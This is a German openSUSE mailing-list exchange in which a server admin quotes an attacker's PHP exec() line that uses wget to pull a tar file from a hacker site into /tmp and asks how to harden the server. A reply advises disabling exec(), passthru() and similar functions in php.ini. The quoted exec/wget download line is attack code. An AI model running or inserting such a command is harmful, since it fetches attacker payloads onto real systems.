Am Thu, 02 May 2013 19:08:57 +0200
schrieb "I.H."
exec("/usr/bin/wget www.hackerseite-url.org/test.tar -o /tmp/test_download.tar");
test.tar landet tatsächlich im /tmp/ Der Angreifer hat es auch geschafft Dateien die dort sind auszuführen. Wie genau weiss ich noch nicht. Fehlt mir hier ein wichtiger Baustein in meiner Webserver-Konfiguration? Oder muss ich wget und curl irgendwie abschalten?
Oder muss ich den Usern /tmp/ irgendwie verbieten. Hat da wer Erfahrung damit und kann mir weiterhelfen.
Viele Grüße
Ingo
Es gibt einige Empfehlungen, PHP sicherer zu machen. Dazu gehört, in der php.ini verschiedene Funktionen global abzuklemmen. exec() gehört auf jeden Fall dazu, ebenso passthru() und einige andere. Das sind riesige Einfallstore, durch die ein Angreifer beliebige Shellkommandos ausführen kann. Suche mal nach "PHP" und "Sicherheit", da wirst du fündig. Jürgen -- Um die Liste abzubestellen, schicken Sie eine Mail an: opensuse-de+unsubscribe@opensuse.org Um den Listen Administrator zu erreichen, schicken Sie eine Mail an: opensuse-de+owner@opensuse.org